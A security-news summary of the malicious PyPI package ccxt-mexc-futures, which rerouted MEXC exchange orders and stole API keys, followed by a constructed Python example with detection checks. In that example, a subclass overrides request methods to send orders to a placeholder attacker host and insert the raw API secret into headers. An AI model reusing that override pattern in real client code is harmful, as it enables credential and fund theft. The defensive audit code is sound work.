Summary: Cybersecurity researchers have discovered a malicious package on PyPI named ccxt-mexc-futures that reroutes trading orders placed on the MEXC cryptocurrency exchange to an attacker-controlled server and captures users' API keys and tokens. The package has been removed from the repository but had been downloaded at least 1,065 times; developers who installed it are advised to revoke any exposed tokens. The incident highlights broader concerns about the security of open-source packages and the threat of malicious dependencies in software supply chains.
Affected: MEXC cryptocurrency exchange, Python Package Index (PyPI)
Keypoints:
- Malicious package ccxt-mexc-futures was designed to redirect trading orders and steal tokens.
- The package posed as an extension of the legitimate ccxt cryptocurrency-trading library and had been downloaded at least 1,065 times before removal.
- It specifically overrode the MEXC-related request functions so that sensitive API keys and tokens were captured and sent to an attacker-controlled domain while orders were rerouted away from the real exchange.
- Users are urged to revoke any MEXC API tokens that were used with the package and to uninstall it immediately to mitigate the risk.
- This incident reflects a growing threat of malicious packages infiltrating open-source repositories.
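The attack pattern in the keypoints above, as an added example that is not the malicious package's code nor ccxt's own: a toy exchange client stands in for the legitimate MEXC class, a subclass models an "extension" that reroutes orders and leaks the secret in the way described, and two checks flag it (an inventory check for the known-bad distribution name, and an audit of the client's request path). The class and method names, the hosts api.mexc.com and exfil.example.invalid, the header names and the sample credentials are assumptions for illustration; only the distribution name ccxt-mexc-futures comes from the page.

```python
"""Constructed model of a dependency that silently reroutes exchange orders and
leaks credentials, plus two checks a team could run against it.

Illustrative only: Mexc is a toy stand-in for the real ccxt 'mexc' class, not
its code; hosts, headers and credentials below are placeholders."""
import hashlib
import hmac
import re
from importlib import metadata
from urllib.parse import urlparse

KNOWN_BAD_DISTRIBUTIONS = {"ccxt-mexc-futures"}   # name reported on the page
TRUSTED_API_HOSTS = {"api.mexc.com"}              # assumed legitimate host for this toy


def normalize_dist_name(name: str) -> str:
    """PEP 503 normalisation so 'CCXT_MEXC.Futures' matches 'ccxt-mexc-futures'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def find_known_bad(dist_names, bad=KNOWN_BAD_DISTRIBUTIONS):
    """Return the known-bad names present in an iterable of distribution names."""
    present = {normalize_dist_name(n) for n in dist_names}
    return sorted(present & {normalize_dist_name(b) for b in bad})


def find_known_bad_installed():
    """Same check against the distributions installed in this interpreter."""
    return find_known_bad(d.metadata["Name"] or "" for d in metadata.distributions())


class Mexc:
    """Toy stand-in for a legitimate exchange client (NOT ccxt's real class)."""
    API_HOST = "api.mexc.com"

    def __init__(self, api_key: str, secret: str):
        self.api_key = api_key
        self.secret = secret

    def describe(self) -> dict:
        return {"id": "mexc", "urls": {"api": f"https://{self.API_HOST}"}}

    def sign(self, path: str, params: dict) -> dict:
        """Build the signed request: HMAC over the query, API key in a header."""
        query = "&".join(f"{k}={v}" for k, v in sorted(params.items()))
        sig = hmac.new(self.secret.encode(), query.encode(), hashlib.sha256).hexdigest()
        url = f"{self.describe()['urls']['api']}/{path}?{query}&signature={sig}"
        return {"url": url, "headers": {"X-MEXC-APIKEY": self.api_key}}

    def create_order(self, symbol: str, side: str, quantity: str) -> dict:
        return self.sign("api/v3/order", {"symbol": symbol, "side": side, "quantity": quantity})


class MaliciousFuturesExtension(Mexc):
    """Models the behaviour the page describes: identical public API, but
    describe() points every order at the attacker's host and sign() adds the
    raw secret to the request. The host is a placeholder, not the real domain."""
    EXFIL_HOST = "exfil.example.invalid"

    def describe(self) -> dict:
        d = super().describe()
        d["urls"]["api"] = f"https://{self.EXFIL_HOST}"   # orders now go to the attacker
        return d

    def sign(self, path: str, params: dict) -> dict:
        req = super().sign(path, params)
        req["headers"]["X-Ext-Auth"] = self.secret   # header the real API never uses
        return req


def _defining_class(cls, attr):
    """First class in the MRO whose own __dict__ defines attr."""
    for klass in cls.__mro__:
        if attr in vars(klass):
            return klass
    return None


def audit_client(client, base=Mexc, trusted_hosts=TRUSTED_API_HOSTS):
    """Flag request-path methods overridden outside the trusted base class, an
    API host off the allowlist, and a request carrying the raw secret."""
    findings = []
    for name in ("describe", "sign"):
        owner = _defining_class(type(client), name)
        if owner is not base:
            findings.append(f"{name}() overridden by {owner.__qualname__}")
    host = urlparse(client.describe()["urls"]["api"]).hostname
    if host not in trusted_hosts:
        findings.append(f"API host {host!r} not in allowlist")
    req = client.create_order("BTCUSDT", "BUY", "0.01")
    leaked = client.secret in req["url"] or any(client.secret in v for v in req["headers"].values())
    if leaked:
        findings.append("raw API secret present in outgoing request")
    return findings


if __name__ == "__main__":
    creds = ("mx_constructed_key", "constructed_secret_0001")   # constructed sample credentials
    print("installed known-bad:", find_known_bad_installed())
    print("legit client:", audit_client(Mexc(*creds)))
    print("malicious client:", audit_client(MaliciousFuturesExtension(*creds)))
```

The audit deliberately checks behaviour rather than names: a package can call itself anything, but it cannot reroute orders without changing the API host the client resolves, and it cannot steal the secret without putting it somewhere in the outgoing request. Against a real ccxt install the same idea applies with `ccxt.mexc` as the trusted base and its real API hosts as the allowlist.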
Source: https://thehackernews.com/2025/04/malicious-pypi-package-targets-mexc.html